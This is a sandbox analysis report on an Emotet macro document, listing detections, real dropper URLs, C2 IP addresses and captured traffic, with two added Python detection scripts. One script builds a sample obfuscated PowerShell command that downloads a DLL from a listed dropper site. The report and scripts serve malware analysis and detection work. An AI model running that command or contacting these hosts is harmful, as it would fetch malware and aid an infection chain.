Analysis Report Informacion_29.doc

Overview

General Information

Sample Name: Informacion_29.doc
Analysis ID: 336937
MD5: 6c1cb4c06ead6f5ce29a931fa12410fa
SHA1: 4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256: 43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
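The signatures "Encrypted powershell cmdline option found", "PowerShell case anomaly found", "Very long command line found" and "Potential dropper URLs found in powershell memory" describe the PowerShell stage, but the report does not reproduce the command line itself. The Python example below is added here and is not part of the Joe Sandbox report: it decodes an -EncodedCommand payload, flags an executable or switch spelled in a letter case PowerShell users do not type, applies a length threshold, and pulls URLs out of the decoded script. The switch-abbreviation table, the 512-character threshold and the sample command line (constructed around the first dropper URL the report lists) are assumptions.

```python
import base64
import re

# Shortest abbreviation powershell.exe accepts for each switch. Assumed table
# modelled on the console host's prefix matching; not exhaustive.
SWITCHES = {
    "EncodedCommand": "e",
    "ExecutionPolicy": "ex",
    "WindowStyle": "w",
    "NoProfile": "nop",
    "NonInteractive": "noni",
    "NoLogo": "nol",
    "NoExit": "noe",
    "Command": "c",
    "File": "f",
}
ALIASES = {"ec": "EncodedCommand", "ep": "ExecutionPolicy"}
LONG_CMDLINE = 512  # assumed threshold; the report does not state its own
URL_RE = re.compile(r"https?://[^\s'\"]+")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Constructed sample: the report does not print the command line, so this one
# is built around the first dropper URL it lists.
SAMPLE_SCRIPT = (
    "$u='http://wheelcomoving.com/p/RuMeRPa/';"
    "(New-Object Net.WebClient).DownloadFile($u, \"$env:USERPROFILE\\Q27V.dll\")"
)


def encode_command(script):
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "POwersheLL -w hidden -ENCOD " + encode_command(SAMPLE_SCRIPT)


def resolve_switch(token):
    """Map '-ENCOD', '/w', '-ec' ... to the canonical switch name, or None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    key = token[1:].lower()
    if key in ALIASES:
        return ALIASES[key]
    for canonical, shortest in SWITCHES.items():
        if canonical.lower().startswith(key) and key.startswith(shortest):
            return canonical
    return None


def has_case_anomaly(body, canonical):
    """True when body spells (a prefix of) canonical in a casing nobody types:
    anything other than the canonical, all-lower, all-upper or Capitalised form."""
    expected = canonical[: len(body)]
    return body not in {expected, expected.lower(), expected.upper(), expected.capitalize()}


def decode_encoded_command(b64):
    """Decode the payload, or return None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    tokens = TOKEN_RE.findall(cmdline)
    result = {
        "very_long": len(cmdline) > LONG_CMDLINE,
        "case_anomalies": [],
        "encoded": False,
        "decoded": None,
        "urls": [],
        "suspicious": False,
    }
    if tokens:
        # Executable name without path, quotes or .exe suffix.
        exe = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1]
        if exe.lower().endswith(".exe"):
            exe = exe[:-4]
        if exe.lower() == "powershell" and has_case_anomaly(exe, "PowerShell"):
            result["case_anomalies"].append(tokens[0])
    for i, tok in enumerate(tokens[1:], start=1):
        canonical = resolve_switch(tok)
        if canonical is None:
            continue
        if tok[1:].lower() not in ALIASES and has_case_anomaly(tok[1:], canonical):
            result["case_anomalies"].append(tok)
        if canonical == "EncodedCommand" and i + 1 < len(tokens):
            result["encoded"] = True
            result["decoded"] = decode_encoded_command(tokens[i + 1].strip('"'))
            if result["decoded"]:
                result["urls"] = URL_RE.findall(result["decoded"])
    result["suspicious"] = bool(
        result["very_long"] or result["case_anomalies"] or result["encoded"]
    )
    return result


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The case check compares each token against the prefix of the canonical spelling, so an all-caps "-ENCOD" passes while "POwersheLL" or "-eNc" is reported; that matches what the sandbox's case-anomaly signature is after, since the former is what a script author might type and the latter is what an obfuscator produces.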

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: rycomputer.com Virustotal: Detection: 11%
Source: 00zyku.com Virustotal: Detection: 7%
Source: wheelcomoving.com Virustotal: Detection: 7%
Source: d-cem.com Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll Metadefender: Detection: 63%
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: Informacion_29.doc Virustotal: Detection: 62%
Source: Informacion_29.doc ReversingLabs: Detection: 79%
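The dropped DLL above runs under rundll32.exe from a directory inside the user profile, and the signature "Creates processes via WMI" describes how the chain reaches it: a Win32_Process.Create call from the document makes the child appear under WmiPrvSE.exe rather than under WINWORD.EXE. The Python example below is added here and is not part of the report. It walks constructed Sysmon-style process-creation events and flags (a) a living-off-the-land binary whose parent is WmiPrvSE.exe and (b) rundll32.exe loading a DLL from a user-writable path, printing the parent chain for each hit. The image paths and the DLL path are taken from the report; the PIDs, parent links and command lines are assumptions.

```python
import re

WMI_HOST = "wmiprvse.exe"
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe",
}
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\|[a-z]:\\programdata\\|[a-z]:\\windows\\temp\\)", re.I
)
# A quoted or bare Windows path ending in .dll anywhere in the command line.
DLL_ARG = re.compile(r'"([a-z]:\\[^"]+?\.dll)"|([a-z]:\\[^\s",]+\.dll)', re.I)

# Constructed events (Sysmon Event ID 1 shape). PIDs, parent links and command
# lines are assumptions; image paths and the DLL path come from the report.
EVENTS = [
    {"pid": 3120, "ppid": 812,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n Informacion_29.doc'},
    {"pid": 2468, "ppid": 900,
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\System32\wbem\WmiPrvSE.exe -secured -Embedding"},
    {"pid": 5084, "ppid": 2468,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "POwersheLL -w hidden -ENCOD SQBFAFgA"},
    {"pid": 5512, "ppid": 5084,
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL"},
    {"pid": 5720, "ppid": 5512,
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL"},
    {"pid": 6000, "ppid": 812,
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dll_argument(cmdline):
    """First .dll path on the command line, or None."""
    for quoted, bare in DLL_ARG.findall(cmdline):
        return quoted or bare
    return None


def lineage(event, by_pid):
    """Image names from the event up to the oldest ancestor present in the events."""
    chain = [basename(event["image"])]
    seen = {event["pid"]}
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        chain.append(basename(parent["image"]))
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return " <- ".join(chain)


def triage_processes(events):
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else None
        reasons = []
        if name in LOLBINS and parent_name == WMI_HOST:
            reasons.append("lolbin-spawned-via-wmi")
        if name == "rundll32.exe":
            dll = dll_argument(e["cmdline"])
            if dll and USER_WRITABLE.match(dll):
                reasons.append("rundll32-dll-from-user-writable-path")
        if reasons:
            findings.append({"pid": e["pid"], "image": name, "reasons": reasons,
                             "lineage": lineage(e, by_pid)})
    return findings


if __name__ == "__main__":
    for hit in triage_processes(EVENTS):
        print(hit["pid"], hit["image"], hit["reasons"], hit["lineage"])
```

Because the WMI hop breaks the parent link, WINWORD.EXE never appears in the lineage of the PowerShell process; that is why the first rule keys on WmiPrvSE.exe as the parent rather than on an Office parent, and why a rule that only looks for Office-to-PowerShell parentage misses this chain.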

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034375AE CryptDecodeObjectEx, 14_2_034375AE
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose, 13_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026EEF FindFirstFileExW, 13_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343109C FindFirstFileW, 14_2_0343109C

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wheelcomoving.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49722 -> 58.97.195.135:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49711 -> 66.85.46.76:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: https://phawayagency.com/wp-admin/mXo4b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49755 -> 138.197.99.250:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /p/RuMeRPa/ HTTP/1.1
    Host: wheelcomoving.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /wp-content/pmJ/ HTTP/1.1
    Host: ketoresetme.com
    Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 66.85.46.76
Source: Joe Sandbox View IP Address: 152.170.79.100
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOST4GEEKS-LLCUS
Source: Joe Sandbox View ASN Name: TelecomArgentinaSAAR
Source: Joe Sandbox View ASN Name: TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH
Source: Joe Sandbox View ASN Name: TelecomArgentinaSAAR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1
    DNT: 0
    Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/
    Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1Cxtn
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 138.197.99.250:8080
    Content-Length: 6500
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 152.170.79.100 (reported 3 times)
Source: unknown TCP traffic detected without corresponding DNS query: 190.247.139.101 (reported 3 times)
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250 (reported 6 times)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344023A InternetReadFile, 14_2_0344023A
Source: global traffic HTTP traffic detected:
    GET /p/RuMeRPa/ HTTP/1.1
    Host: wheelcomoving.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /wp-content/pmJ/ HTTP/1.1
    Host: ketoresetme.com
    Connection: Keep-Alive
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
Source: unknown DNS traffic detected: queries for: wheelcomoving.com
Source: unknown HTTP traffic detected:
    POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1
    DNT: 0
    Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/
    Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1Cxtn
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 138.197.99.250:8080
    Content-Length: 6500
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 07 Jan 2021 10:52:58 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Vary: Accept-Encoding
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
